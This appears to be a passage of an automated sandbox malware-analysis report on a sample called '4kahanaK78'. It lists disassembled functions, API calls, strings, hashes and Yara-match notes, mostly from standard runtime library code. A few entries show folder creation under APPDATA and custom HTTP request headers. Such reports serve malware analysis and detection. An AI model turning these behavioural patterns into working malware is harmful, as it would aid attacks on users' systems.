                                    • Source File: 00000000.00000002.3309607086.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                    • Associated: 00000000.00000002.3309587632.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000000.00000002.3309627188.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000000.00000002.3309646682.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_10000000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 225e9490ce15994035050fff8e8d94bbe50aeb352c3921d505d22bbc77bda227
                                    • Instruction ID: 49573a245b17cd2143a7f0a663dc82b9d5ba07e6c12e429f55ccbb336c262c76
                                    • Opcode Fuzzy Hash: 225e9490ce15994035050fff8e8d94bbe50aeb352c3921d505d22bbc77bda227
                                    • Instruction Fuzzy Hash: CEE08C32E11228EBCB10CB88C940E8AB3ECFB86A80F114096B505E3101D274DF00C7C2
                                    Function 04B538D6 Relevance: .0, Instructions: 22COMMONLIBRARYCODE
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3308616404.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_4b40000_4kahanaK78.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 938b1ef97d91fa147a56b9632c6ce73ee018995428c08987881a566186e623af
                                    • Instruction ID: 246488dfe49aa5c32b350fed1d045568dcfc0a17c0cb868f336d2f696df64edd
                                    • Opcode Fuzzy Hash: 938b1ef97d91fa147a56b9632c6ce73ee018995428c08987881a566186e623af
                                    • Instruction Fuzzy Hash: 39E08C72911268EBCB25DB8CC945E8AF3FCEB44B80B114496BD01D3220C270EE00C7D0
                                    Function 0041366F Relevance: .0, Instructions: 22COMMONLIBRARYCODE
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306439694.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.3306439694.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 938b1ef97d91fa147a56b9632c6ce73ee018995428c08987881a566186e623af
                                    • Instruction ID: fd5c11342e53f5fd9e78528a8d63764efe72d1229905d7d1658511e5362cd08d
                                    • Opcode Fuzzy Hash: 938b1ef97d91fa147a56b9632c6ce73ee018995428c08987881a566186e623af
                                    • Instruction Fuzzy Hash: EEE04632911228EBCB24DF898A08A8AF3ACEB44B09B11049AB501D3210C274DE80C7D4
                                    Function 04CEE30D Relevance: .0, Instructions: 21COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000003.2594383754.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_3_4ce0000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 9253131997efead4d70db6443559b4166ab1d7f2f85f8f4b6bf8833fc8910a7c
                                    • Instruction ID: b91f9200a165f7f20a789dd953a104fe294c578cebaf163ccbdad38ff115fb37
                                    • Opcode Fuzzy Hash: 9253131997efead4d70db6443559b4166ab1d7f2f85f8f4b6bf8833fc8910a7c
                                    • Instruction Fuzzy Hash: E7E04631400148BFCB117F25CC48D993F3AEB00281B004424F90986131CB39EE82DA54
                                    Function 00409088 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 51libraryloaderCOMMON
                                    Download Yara Rule
                                    APIs
                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(0042AF64,00000FA0,?,?,00409066), ref: 00409094
                                    • GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,00409066), ref: 0040909F
                                    • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00409066), ref: 004090B0
                                    • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 004090C2
                                    • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 004090D0
                                    • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,00409066), ref: 004090F3
                                    • RtlDeleteCriticalSection.NTDLL(0042AF64), ref: 0040910F
                                    • CloseHandle.KERNEL32(00000000,?,?,00409066), ref: 0040911F
                                    Strings
                                    • WakeAllConditionVariable, xrefs: 004090C8
                                    • SleepConditionVariableCS, xrefs: 004090BC
                                    • api-ms-win-core-synch-l1-2-0.dll, xrefs: 0040909A
                                    • kernel32.dll, xrefs: 004090AB
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306439694.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.3306439694.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                                    • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                    • API String ID: 2565136772-3242537097
                                    • Opcode ID: f40741635cb42056a58b419ea30317dd48f67c6f9c1bd194eb93f888c376e813
                                    • Instruction ID: acc3deda13f420712ce33b53dd37b90dad73ad81c8ab949137041f64949c0d3f
                                    • Opcode Fuzzy Hash: f40741635cb42056a58b419ea30317dd48f67c6f9c1bd194eb93f888c376e813
                                    • Instruction Fuzzy Hash: 410196B1F40322ABE7202B75AD0DB963B989B4CB01B154036FD15E2295D77CCC01866D
                                    Function 04CF65E3 Relevance: 19.6, APIs: 13, Instructions: 113COMMON
                                    Download Yara Rule
                                    APIs
                                    • _free.LIBCMT ref: 04CF661C
                                    • ___free_lconv_mon.LIBCMT ref: 04CF6627
                                      • Part of subcall function 04CF62E3: _free.LIBCMT ref: 04CF6300
                                      • Part of subcall function 04CF62E3: _free.LIBCMT ref: 04CF6312
                                      • Part of subcall function 04CF62E3: _free.LIBCMT ref: 04CF6324
                                      • Part of subcall function 04CF62E3: _free.LIBCMT ref: 04CF6336
                                      • Part of subcall function 04CF62E3: _free.LIBCMT ref: 04CF6348
                                      • Part of subcall function 04CF62E3: _free.LIBCMT ref: 04CF635A
                                      • Part of subcall function 04CF62E3: _free.LIBCMT ref: 04CF636C
                                      • Part of subcall function 04CF62E3: _free.LIBCMT ref: 04CF637E
                                      • Part of subcall function 04CF62E3: _free.LIBCMT ref: 04CF6390
                                      • Part of subcall function 04CF62E3: _free.LIBCMT ref: 04CF63A2
                                      • Part of subcall function 04CF62E3: _free.LIBCMT ref: 04CF63B4
                                      • Part of subcall function 04CF62E3: _free.LIBCMT ref: 04CF63C6
                                      • Part of subcall function 04CF62E3: _free.LIBCMT ref: 04CF63D8
                                    • _free.LIBCMT ref: 04CF663E
                                    • _free.LIBCMT ref: 04CF6653
                                    • _free.LIBCMT ref: 04CF665E
                                    • _free.LIBCMT ref: 04CF6680
                                    • _free.LIBCMT ref: 04CF6693
                                    • _free.LIBCMT ref: 04CF66A1
                                    • _free.LIBCMT ref: 04CF66AC
                                    • _free.LIBCMT ref: 04CF66E4
                                    • _free.LIBCMT ref: 04CF66EB
                                    • _free.LIBCMT ref: 04CF6708
                                    • _free.LIBCMT ref: 04CF6720
                                    Memory Dump Source
                                    • Source File: 00000000.00000003.2594383754.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_3_4ce0000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: _free$___free_lconv_mon
                                    • String ID:
                                    • API String ID: 3658870901-0
                                    • Opcode ID: 618733a9981a7d7e15cd004ff7cd88c67c18ad7243d380dd4353b554986c4def
                                    • Instruction ID: b7e77e35eb60a52c49567081d144d294a1647fec1457516d92eb22022a24bd54
                                    • Opcode Fuzzy Hash: 618733a9981a7d7e15cd004ff7cd88c67c18ad7243d380dd4353b554986c4def
                                    • Instruction Fuzzy Hash: C8314B317006009FEBA1AE39DC44B5A77EAAF00714F14842AE295D7252DF7AFA51DB20
                                    Function 1000A001 Relevance: 19.6, APIs: 13, Instructions: 113COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • ___free_lconv_mon.LIBCMT ref: 1000A045
                                      • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C43D
                                      • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C44F
                                      • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C461
                                      • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C473
                                      • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C485
                                      • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C497
                                      • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C4A9
                                      • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C4BB
                                      • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C4CD
                                      • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C4DF
                                      • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C4F1
                                      • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C503
                                      • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C515
                                    • _free.LIBCMT ref: 1000A03A
                                      • Part of subcall function 10007A3C: RtlFreeHeap.NTDLL(00000000,00000000,?,100066F0), ref: 10007A52
                                      • Part of subcall function 10007A3C: GetLastError.KERNEL32(?,?,100066F0), ref: 10007A64
                                    • _free.LIBCMT ref: 1000A05C
                                    • _free.LIBCMT ref: 1000A071
                                    • _free.LIBCMT ref: 1000A07C
                                    • _free.LIBCMT ref: 1000A09E
                                    • _free.LIBCMT ref: 1000A0B1
                                    • _free.LIBCMT ref: 1000A0BF
                                    • _free.LIBCMT ref: 1000A0CA
                                    • _free.LIBCMT ref: 1000A102
                                    • _free.LIBCMT ref: 1000A109
                                    • _free.LIBCMT ref: 1000A126
                                    • _free.LIBCMT ref: 1000A13E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3309607086.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                    • Associated: 00000000.00000002.3309587632.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000000.00000002.3309627188.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000000.00000002.3309646682.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_10000000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                    • String ID:
                                    • API String ID: 161543041-0
                                    • Opcode ID: 4f6d344103cf7811bd09b71d21c977f492913705ec11a3a18dac91d66e09e7eb
                                    • Instruction ID: 0af802e5104cca544d2385e0ca1ca05a391064d886f9d3a5cb5d526743884836
                                    • Opcode Fuzzy Hash: 4f6d344103cf7811bd09b71d21c977f492913705ec11a3a18dac91d66e09e7eb
                                    • Instruction Fuzzy Hash: 24315B31A002059BFB20DA34DC41B8A77E9FB423E0F114519F449E719ADE79FE908761
                                    Function 04B5744A Relevance: 19.6, APIs: 13, Instructions: 113COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • ___free_lconv_mon.LIBCMT ref: 04B5748E
                                      • Part of subcall function 04B5714A: _free.LIBCMT ref: 04B57167
                                      • Part of subcall function 04B5714A: _free.LIBCMT ref: 04B57179
                                      • Part of subcall function 04B5714A: _free.LIBCMT ref: 04B5718B
                                      • Part of subcall function 04B5714A: _free.LIBCMT ref: 04B5719D
                                      • Part of subcall function 04B5714A: _free.LIBCMT ref: 04B571AF
                                      • Part of subcall function 04B5714A: _free.LIBCMT ref: 04B571C1
                                      • Part of subcall function 04B5714A: _free.LIBCMT ref: 04B571D3
                                      • Part of subcall function 04B5714A: _free.LIBCMT ref: 04B571E5
                                      • Part of subcall function 04B5714A: _free.LIBCMT ref: 04B571F7
                                      • Part of subcall function 04B5714A: _free.LIBCMT ref: 04B57209
                                      • Part of subcall function 04B5714A: _free.LIBCMT ref: 04B5721B
                                      • Part of subcall function 04B5714A: _free.LIBCMT ref: 04B5722D
                                      • Part of subcall function 04B5714A: _free.LIBCMT ref: 04B5723F
                                    • _free.LIBCMT ref: 04B57483
                                      • Part of subcall function 04B51D29: HeapFree.KERNEL32(00000000,00000000,?,04B572DB,?,00000000,?,?,?,04B57302,?,00000007,?,?,04B575E1,?), ref: 04B51D3F
                                      • Part of subcall function 04B51D29: GetLastError.KERNEL32(?,?,04B572DB,?,00000000,?,?,?,04B57302,?,00000007,?,?,04B575E1,?,?), ref: 04B51D51
                                    • _free.LIBCMT ref: 04B574A5
                                    • _free.LIBCMT ref: 04B574BA
                                    • _free.LIBCMT ref: 04B574C5
                                    • _free.LIBCMT ref: 04B574E7
                                    • _free.LIBCMT ref: 04B574FA
                                    • _free.LIBCMT ref: 04B57508
                                    • _free.LIBCMT ref: 04B57513
                                    • _free.LIBCMT ref: 04B5754B
                                    • _free.LIBCMT ref: 04B57552
                                    • _free.LIBCMT ref: 04B5756F
                                    • _free.LIBCMT ref: 04B57587
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3308616404.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_4b40000_4kahanaK78.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                    • String ID:
                                    • API String ID: 161543041-0
                                    • Opcode ID: 618733a9981a7d7e15cd004ff7cd88c67c18ad7243d380dd4353b554986c4def
                                    • Instruction ID: 14cb6ab2ab1a9437f4c82fe233bb491e545522ac7e1cbfa12bd6e5481a9237c1
                                    • Opcode Fuzzy Hash: 618733a9981a7d7e15cd004ff7cd88c67c18ad7243d380dd4353b554986c4def
                                    • Instruction Fuzzy Hash: 95316B31B00605AFEB25AE3DE844B5AF7E8EF00354F50489AE869D71B0DF74F8409B20
                                    Function 004171E3 Relevance: 19.6, APIs: 13, Instructions: 113COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • ___free_lconv_mon.LIBCMT ref: 00417227
                                      • Part of subcall function 00416EE3: _free.LIBCMT ref: 00416F00
                                      • Part of subcall function 00416EE3: _free.LIBCMT ref: 00416F12
                                      • Part of subcall function 00416EE3: _free.LIBCMT ref: 00416F24
                                      • Part of subcall function 00416EE3: _free.LIBCMT ref: 00416F36
                                      • Part of subcall function 00416EE3: _free.LIBCMT ref: 00416F48
                                      • Part of subcall function 00416EE3: _free.LIBCMT ref: 00416F5A
                                      • Part of subcall function 00416EE3: _free.LIBCMT ref: 00416F6C
                                      • Part of subcall function 00416EE3: _free.LIBCMT ref: 00416F7E
                                      • Part of subcall function 00416EE3: _free.LIBCMT ref: 00416F90
                                      • Part of subcall function 00416EE3: _free.LIBCMT ref: 00416FA2
                                      • Part of subcall function 00416EE3: _free.LIBCMT ref: 00416FB4
                                      • Part of subcall function 00416EE3: _free.LIBCMT ref: 00416FC6
                                      • Part of subcall function 00416EE3: _free.LIBCMT ref: 00416FD8
                                    • _free.LIBCMT ref: 0041721C
                                      • Part of subcall function 00411AC2: RtlFreeHeap.NTDLL(00000000,00000000,?,00417074,?,00000000,?,?,?,0041709B,?,00000007,?,?,0041737A,?), ref: 00411AD8
                                      • Part of subcall function 00411AC2: GetLastError.KERNEL32(?,?,00417074,?,00000000,?,?,?,0041709B,?,00000007,?,?,0041737A,?,?), ref: 00411AEA
                                    • _free.LIBCMT ref: 0041723E
                                    • _free.LIBCMT ref: 00417253
                                    • _free.LIBCMT ref: 0041725E
                                    • _free.LIBCMT ref: 00417280
                                    • _free.LIBCMT ref: 00417293
                                    • _free.LIBCMT ref: 004172A1
                                    • _free.LIBCMT ref: 004172AC
                                    • _free.LIBCMT ref: 004172E4
                                    • _free.LIBCMT ref: 004172EB
                                    • _free.LIBCMT ref: 00417308
                                    • _free.LIBCMT ref: 00417320
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306439694.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.3306439694.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                    • String ID:
                                    • API String ID: 161543041-0
                                    • Opcode ID: 78a1156ba884ffaad899c775ae10142786294d6101bc0a8744c53f5092b5fafb
                                    • Instruction ID: edf7faae9d3bf0885fb7c5c7e3fb72ef0fb286978f56b7ec46c8a8d77fdb3eda
                                    • Opcode Fuzzy Hash: 78a1156ba884ffaad899c775ae10142786294d6101bc0a8744c53f5092b5fafb
                                    • Instruction Fuzzy Hash: A1313D31608204ABEB21AB7AD845BD777F4AF41354F24885BF559D7261EE38ECC1C628
                                    Function 04CEA4DB Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 304COMMON
                                    Download Yara Rule
                                    APIs
                                    • IsInExceptionSpec.LIBVCRUNTIME ref: 04CEA5D8
                                    • type_info::operator==.LIBVCRUNTIME ref: 04CEA5FA
                                    • ___TypeMatch.LIBVCRUNTIME ref: 04CEA709
                                    • IsInExceptionSpec.LIBVCRUNTIME ref: 04CEA7DB
                                    • _UnwindNestedFrames.LIBCMT ref: 04CEA85F
                                    • CallUnexpected.LIBVCRUNTIME ref: 04CEA87A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000003.2594383754.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_3_4ce0000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                    • String ID: csm$csm$csm
                                    • API String ID: 2123188842-393685449
                                    • Opcode ID: 5cc99db94015cab6c404d32d320387b6f9b26d2efedfbed277260f256f17e541
                                    • Instruction ID: f1706070d7e07c16339ef952349df60172e4e25346c463a27abe9f38e1578fb9
                                    • Opcode Fuzzy Hash: 5cc99db94015cab6c404d32d320387b6f9b26d2efedfbed277260f256f17e541
                                    • Instruction Fuzzy Hash: 8AB17C71800209EFDF29DFA6D9809BEBBB6BF04314B14815AE8156B211D732FA52DB91
                                    Function 04B4B342 Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 304COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • IsInExceptionSpec.LIBVCRUNTIME ref: 04B4B43F
                                    • type_info::operator==.LIBVCRUNTIME ref: 04B4B461
                                    • ___TypeMatch.LIBVCRUNTIME ref: 04B4B570
                                    • IsInExceptionSpec.LIBVCRUNTIME ref: 04B4B642
                                    • _UnwindNestedFrames.LIBCMT ref: 04B4B6C6
                                    • CallUnexpected.LIBVCRUNTIME ref: 04B4B6E1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3308616404.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_4b40000_4kahanaK78.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                    • String ID: csm$csm$csm
                                    • API String ID: 2123188842-393685449
                                    • Opcode ID: 5cc99db94015cab6c404d32d320387b6f9b26d2efedfbed277260f256f17e541
                                    • Instruction ID: f958f8c1c06dd8ad2a3a2dda83ddbe627588a88ea3576b8e757bd005fb919053
                                    • Opcode Fuzzy Hash: 5cc99db94015cab6c404d32d320387b6f9b26d2efedfbed277260f256f17e541
                                    • Instruction Fuzzy Hash: 45B16C71C04209EFDF15DFA8C8809AEB7B5FF88314B14459AEA156B211D730FA51EFA1
                                    Function 0040B0DB Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 304COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • IsInExceptionSpec.LIBVCRUNTIME ref: 0040B1D8
                                    • type_info::operator==.LIBVCRUNTIME ref: 0040B1FA
                                    • ___TypeMatch.LIBVCRUNTIME ref: 0040B309
                                    • IsInExceptionSpec.LIBVCRUNTIME ref: 0040B3DB
                                    • _UnwindNestedFrames.LIBCMT ref: 0040B45F
                                    • CallUnexpected.LIBVCRUNTIME ref: 0040B47A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306439694.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.3306439694.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                    • String ID: csm$csm$csm
                                    • API String ID: 2123188842-393685449
                                    • Opcode ID: 5cc99db94015cab6c404d32d320387b6f9b26d2efedfbed277260f256f17e541
                                    • Instruction ID: 3d06a1d46c9e927f581abf88e740a03f69e3fad8364d4cdf02b7d05f470413ac
                                    • Opcode Fuzzy Hash: 5cc99db94015cab6c404d32d320387b6f9b26d2efedfbed277260f256f17e541
                                    • Instruction Fuzzy Hash: DAB15471800209EFCF29DFA5C8819AEB7B5FF14314B14456BE8117B692D338DA61CBDA
                                    Function 10001CDD Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 156COMMON
                                    Download Yara Rule
                                    APIs
                                    • __EH_prolog3_GS.LIBCMT ref: 10001CE7
                                    • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?,00000264,1000202E,?), ref: 10001D2D
                                    • CreateDirectoryA.KERNEL32(?,00000000,?,?,00000000,?,?,00000001,00000000), ref: 10001DE9
                                    • GetLastError.KERNEL32(?,?,00000001,00000000), ref: 10001DF9
                                    • GetTempPathA.KERNEL32(00000104,?,?,?,00000001,00000000), ref: 10001E12
                                    • CreateDirectoryA.KERNEL32(?,00000000,?,?,00000000,?,?,00000001,00000000,?,?,00000001,00000000), ref: 10001ECC
                                    • GetLastError.KERNEL32(?,?,00000001,00000000,?,?,00000001,00000000), ref: 10001ED2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3309607086.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                    • Associated: 00000000.00000002.3309587632.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000000.00000002.3309627188.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000000.00000002.3309646682.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_10000000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: CreateDirectoryErrorLastPath$FolderH_prolog3_Temp
                                    • String ID: APPDATA$TMPDIR
                                    • API String ID: 1838500112-4048745339
                                    • Opcode ID: 00851e4ded4e5e03db144df6c0333d2f877147d47fd9b3b0a9c51e3763c74205
                                    • Instruction ID: 65cc4f0b8c34a884811309b14049f09b1d2f67be4c4777eb46c939f585e6cab7
                                    • Opcode Fuzzy Hash: 00851e4ded4e5e03db144df6c0333d2f877147d47fd9b3b0a9c51e3763c74205
                                    • Instruction Fuzzy Hash: 6B515E70900259EAFB64EBA4CC89BDDB7B9EF04380F5005E9E109A6055DB74AFC4CF61
                                    Function 100010C7 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 55networkCOMMON
                                    Download Yara Rule
                                    APIs
                                    • __EH_prolog3_GS.LIBCMT ref: 100010CE
                                    • HttpAddRequestHeadersA.WININET(?,?,?,20000000), ref: 10001103
                                    • HttpAddRequestHeadersA.WININET(?,?,?,20000000), ref: 10001123
                                    • HttpAddRequestHeadersA.WININET(?,?,?,20000000), ref: 10001143
                                    • HttpAddRequestHeadersA.WININET(?,?,?,20000000), ref: 10001163
                                    Strings
                                    • Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0, xrefs: 10001145
                                    • Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1, xrefs: 100010D9
                                    • Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1, xrefs: 10001125
                                    • Accept-Language: ru-RU,ru;q=0.9,en;q=0.8, xrefs: 10001105
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3309607086.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                    • Associated: 00000000.00000002.3309587632.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000000.00000002.3309627188.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000000.00000002.3309646682.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_10000000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: HeadersHttpRequest$H_prolog3_
                                    • String ID: Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1$Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0$Accept-Language: ru-RU,ru;q=0.9,en;q=0.8$Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                    • API String ID: 1254599795-787135837
                                    • Opcode ID: 8d3d7825b2bb6dea36e27622bcd4b7ddfc44603214986a735072bca3a8471053
                                    • Instruction ID: 505ec4d7c45309835e960384523a5e30396a54de81b8e769e2ad7823f420ed9d
                                    • Opcode Fuzzy Hash: 8d3d7825b2bb6dea36e27622bcd4b7ddfc44603214986a735072bca3a8471053
                                    • Instruction Fuzzy Hash: DA119372D0010DEEEB10DBA9DC91DEEBB78EB18351FA0C019F22176051DB75AA45DBB1
                                    Function 04CF04E5 Relevance: 15.1, APIs: 10, Instructions: 69COMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000003.2594383754.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_3_4ce0000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: _free
                                    • String ID:
                                    • API String ID: 269201875-0
                                    • Opcode ID: fe283fd8c536959d9cbb52a3305d3fc21224adf50181bca55d874b9ff2adc1f7
                                    • Instruction ID: acaa041e7243b144c48e04bfb57c0b5a001fb5848c61560116689d056185857d
                                    • Opcode Fuzzy Hash: fe283fd8c536959d9cbb52a3305d3fc21224adf50181bca55d874b9ff2adc1f7
                                    • Instruction Fuzzy Hash: 9721AB76900108BFDB41EF95CC80DDE7BB9BF08644F01856AF6559B222DB36EA44DB80
                                    Function 10006D58 Relevance: 15.1, APIs: 10, Instructions: 69COMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3309607086.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                    • Associated: 00000000.00000002.3309587632.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000000.00000002.3309627188.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000000.00000002.3309646682.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_10000000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: _free$ErrorFreeHeapLast
                                    • String ID:
                                    • API String ID: 776569668-0
                                    • Opcode ID: 8b6844ad3729e3fcad320fbe5a6c795a3d07021f3fe8183e596603b455261e22
                                    • Instruction ID: b25e74a844c2162c16b878e0af7aba0ae7dfb07406db983acad16b8670962f51
                                    • Opcode Fuzzy Hash: 8b6844ad3729e3fcad320fbe5a6c795a3d07021f3fe8183e596603b455261e22
                                    • Instruction Fuzzy Hash: B121EB7AA00108AFDB01DF94CC81CDD7BB9FF48290F4041A6F509AB265DB35EB45CB91
                                    Function 04B5134C Relevance: 15.1, APIs: 10, Instructions: 69COMMON
                                    Download Yara Rule
                                    APIs
                                    • _free.LIBCMT ref: 04B51362
                                      • Part of subcall function 04B51D29: HeapFree.KERNEL32(00000000,00000000,?,04B572DB,?,00000000,?,?,?,04B57302,?,00000007,?,?,04B575E1,?), ref: 04B51D3F
                                      • Part of subcall function 04B51D29: GetLastError.KERNEL32(?,?,04B572DB,?,00000000,?,?,?,04B57302,?,00000007,?,?,04B575E1,?,?), ref: 04B51D51
                                    • _free.LIBCMT ref: 04B5136E
                                    • _free.LIBCMT ref: 04B51379
                                    • _free.LIBCMT ref: 04B51384
                                    • _free.LIBCMT ref: 04B5138F
